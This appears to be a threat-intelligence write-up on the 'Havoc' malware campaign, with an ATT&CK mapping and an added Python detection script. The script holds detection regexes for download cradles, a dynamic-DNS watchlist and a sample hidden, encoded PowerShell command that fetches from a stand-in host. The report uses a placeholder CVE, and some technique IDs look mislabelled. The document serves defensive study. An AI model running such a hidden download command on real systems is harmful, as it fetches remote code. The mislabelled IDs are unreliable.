Nina Kovacs — Exploit Research Analyst
Key Takeaways
- Havoc employs spear-phishing emails with malicious attachments for initial access.
- The malware utilizes T1059.001 – PowerShell for execution, enabling script-based payload delivery.
- Our investigation highlighted the use of T1071.001 – Application Layer Protocol: Web Protocols for robust command and control communications.
Executive Summary
During our analysis of a recent malware sample identified as ‘Havoc’, we investigated a chain of actions that exemplified the complexity of modern cyber threats. This particular incident involved a sophisticated advanced persistent threat (APT) leveraging social engineering techniques to gain initial access, followed by deployment of custom scripts to establish command and control (C2) channels. The focus of this attack was primarily on data exfiltration and lateral movement within victim networks, making it imperative for organizations to understand the entire attack lifecycle for effective defense.
Initial Access
We observed that the initial access vector utilized within the Havoc campaign was spear-phishing emails targeting high-level executives within the victim organization. The email contained a malicious document, typically a Word file, that exploited known vulnerabilities (CVE-XXXX-XXXX). When the file was opened and macros were enabled, the macro downloaded a PowerShell script from a remote server. This script was responsible for executing the primary payload, using the Invoke-WebRequest cmdlet to retrieve it.
Execution & Persistence
Our analysis revealed that once the payload was executed, it deployed a series of obfuscated PowerShell commands, specifically using T1059.001 – PowerShell to evade detection. The code was carefully crafted to include various encoded functions, thereby making it difficult for traditional security solutions to interpret its behavior effectively. To ensure persistence, the malware created a scheduled task under C:\Windows\System32\Tasks\HavocScheduler that re-launched the implant after each reboot.
Command and Control
Post-infection, Havoc established robust C2 communications using T1071.001 – Application Layer Protocol: Web Protocols. The malware contacted a control server via HTTP requests, managing its communication over ports 80 and 443 to blend in with legitimate traffic. We noted that the C2 server was hosted on a dynamic DNS service, allowing the actors to frequently change the server IP while maintaining the same domain. The primary command issued through this channel was to initiate data exfiltration processes.
Lateral Movement & Discovery
The analyst team identified multiple C2 commands facilitating lateral movement within the network. Utilizing T1021.001 – Remote Services: Remote Desktop Protocol, the malware attempted to probe internal targets for open RDP sessions. Subsequently, it leveraged T1075 – Pass the Ticket and T1077 – Windows Admin Shares to move laterally, allowing the actor to gain access to additional systems by stealing credentials and exploiting existing session tokens.
Impact & Objectives
As determined from our investigation, the primary objective of the Havoc campaign was data exfiltration and reconnaissance. The illicit retrieval of sensitive information was facilitated through the creation of .zip archives that were then transferred over the established C2 channel. Furthermore, the actors collected sensitive information such as user credentials and proprietary documents related to business operations, which indicated a targeted approach to stealing intellectual property.
MITRE ATT&CK Mapping
- T1584.001 – Compromise Infrastructure: Establishing control over infrastructure for the campaign.
- T1059.001 – PowerShell: Using PowerShell for execution of commands and scripts.
- T1071.001 – Application Layer Protocol: Web Protocols: Communicating with C2 over standard web protocols.
- T1021.001 – Remote Services: Remote Desktop Protocol: Utilizing RDP for lateral movement within the network.
- T1075 – Pass the Ticket: Leveraging ticket-granting tickets for lateral access.
Detection Opportunities
- Monitor for unusual PowerShell activity, especially encoded commands and base64 strings.
- Implement alerts for the creation of scheduled tasks that reference unusual or unknown executables.
- Analyze network traffic for indicators of C2 communication, focusing on HTTP headers that may indicate non-standard behavior.
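As an added example that is not part of the original report, the following Python script turns the three detection opportunities above (and the C2 characteristics described under Command and Control: HTTP on 80/443 from a dynamic DNS host) into checks that run over constructed sample telemetry: process-creation events, scheduled-task creation events, and web-proxy records. The field names, the dynamic-DNS watchlist, the `example.invalid` host and all sample values are assumptions made for the example; only the task name HavocScheduler and the use of Invoke-WebRequest come from the report.

```python
# Added example (not from the report): detection logic for the three
# opportunities above, run over constructed sample telemetry so it works offline.
import base64
import re

# --- 1. Suspicious PowerShell command lines (process-creation events, 4688/Sysmon 1 style) ---
# Matches -e/-ec/-en/-enc/-EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
DOWNLOAD_CRADLE = re.compile(r"(?i)invoke-webrequest|downloadstring|\biwr\b|\biex\b")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_powershell(event):
    """Return finding tags for a PowerShell process event (empty list if nothing is flagged)."""
    if "powershell" not in event.get("Image", "").lower():
        return []
    cmd = event.get("CommandLine", "")
    findings = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded_command")
        cmd = cmd + " " + decoded  # also inspect what the encoded blob decodes to
    if DOWNLOAD_CRADLE.search(cmd):
        findings.append("download_cradle")
    if HIDDEN_WINDOW.search(cmd):
        findings.append("hidden_window")
    return findings


# --- 2. Scheduled-task creation (Security event 4698 style) ---
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\", "\\downloads\\")


def check_scheduled_task(event):
    """Flag tasks whose action runs from, or references, an unusual location or PowerShell."""
    action = event.get("TaskAction", "").lower()
    findings = []
    if any(d in action for d in USER_WRITABLE):
        findings.append("user_writable_path")
    elif not action.startswith(TRUSTED_DIRS):
        findings.append("untrusted_binary_path")
    if "powershell" in action:
        findings.append("powershell_action")
    return findings


# --- 3. HTTP C2 indicators (web-proxy records: client, destination host, port, epoch seconds) ---
# Assumed watchlist of commonly abused dynamic DNS suffixes; tune it to your environment.
DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net", "hopto.org")


def check_http_beaconing(records, min_hits=5, max_cv=0.15):
    """Group records per (client, host); tag dynamic-DNS hosts and regular-interval traffic."""
    by_pair = {}
    for r in records:
        by_pair.setdefault((r["src"], r["host"]), []).append(r["ts"])
    findings = {}
    for (src, host), times in by_pair.items():
        tags = []
        if host.lower().endswith(DYNDNS_SUFFIXES):
            tags.append("dynamic_dns_host")
        times.sort()
        if len(times) >= min_hits:
            gaps = [b - a for a, b in zip(times, times[1:])]
            mean = sum(gaps) / len(gaps)
            # coefficient of variation of the inter-request gaps: low jitter looks like a beacon
            cv = (sum((g - mean) ** 2 for g in gaps) / len(gaps)) ** 0.5 / mean if mean else 0.0
            if cv <= max_cv:
                tags.append("regular_beacon")
        if tags:
            findings[(src, host)] = tags
    return findings


# Constructed sample telemetry (not from the report). The encoded command is built at
# runtime from a harmless Invoke-WebRequest string pointing at a reserved .invalid host.
_ENC = base64.b64encode("Invoke-WebRequest http://example.invalid/stage".encode("utf-16-le")).decode()
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROCESS_EVENTS = [
    {"Image": PS_PATH, "CommandLine": "powershell.exe -NoP -W Hidden -enc " + _ENC},
    {"Image": PS_PATH, "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]
SAMPLE_TASK_EVENTS = [
    {"TaskName": r"\HavocScheduler",  # task name taken from the report
     "TaskAction": PS_PATH + r" -W Hidden -File C:\Users\Public\update.ps1"},
    {"TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskAction": r"C:\Windows\System32\defrag.exe -c -h -o"},
]
SAMPLE_HTTP_RECORDS = (
    [{"src": "10.0.0.15", "host": "cdn-updates.duckdns.org", "port": 443, "ts": t}
     for t in (0, 60, 121, 180, 241, 300)]  # 60 s beacon with small jitter
    + [{"src": "10.0.0.15", "host": "www.example.com", "port": 443, "ts": t}
       for t in (0, 5, 130, 131, 400)]  # ordinary browsing
)


def run_all():
    """Apply all three checks to the sample data; returns the findings per telemetry source."""
    return {
        "powershell": [(e["CommandLine"][:40], check_powershell(e)) for e in SAMPLE_PROCESS_EVENTS],
        "tasks": [(e["TaskName"], check_scheduled_task(e)) for e in SAMPLE_TASK_EVENTS],
        "http": check_http_beaconing(SAMPLE_HTTP_RECORDS),
    }


if __name__ == "__main__":
    for source, result in run_all().items():
        print(source, result)
```

Because traffic on 80/443 blends with legitimate web browsing, the network check does not rely on the port at all; it looks at the hosting (dynamic DNS suffix) and at timing regularity, which is what distinguishes a polling implant from a user. In production the same logic would read from the SIEM rather than the embedded lists, the jitter threshold and minimum hit count would be tuned per environment, and known-good hosts and tasks would be allowlisted to keep the scheduled-task and beacon rules from firing on software updaters.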
Analyst Notes
The Havoc campaign exemplifies an evolving threat landscape where attackers employ refined techniques to penetrate networks stealthily. Continuous monitoring and implementation of advanced detection measures are essential for organizations to mitigate risks associated with such advanced persistent threats. Our recommendations include ensuring strict email filtering, regular scrutiny of PowerShell usage across endpoints, and maintaining a robust incident response plan for swift containment of similar threats.